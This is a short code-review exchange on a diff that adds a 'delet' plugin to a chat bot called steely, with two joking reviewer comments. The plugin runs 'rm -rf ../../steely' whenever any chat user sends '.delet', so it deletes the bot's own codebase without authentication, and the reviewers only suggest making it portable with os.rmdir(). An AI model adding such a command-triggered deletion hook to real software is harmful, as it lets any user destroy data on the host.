steely/plugins/delet.py

```diff
@@ -0,0 +1,13 @@
+'''
+best plugin
+'''
+
+__author__ = 'sam'
+COMMAND= '.delet'
+
+import subprocess
+
+
+def main(bot, author_id, message, thread_id, thread_type, **kwargs):
+    subprocess.Popen("rm -rf ../../steely".split())
```

Comment:
this will not work on Windows, is therefore insubmissable to the perfect steely codebase.

Reply:
`os.rmdir()` maybe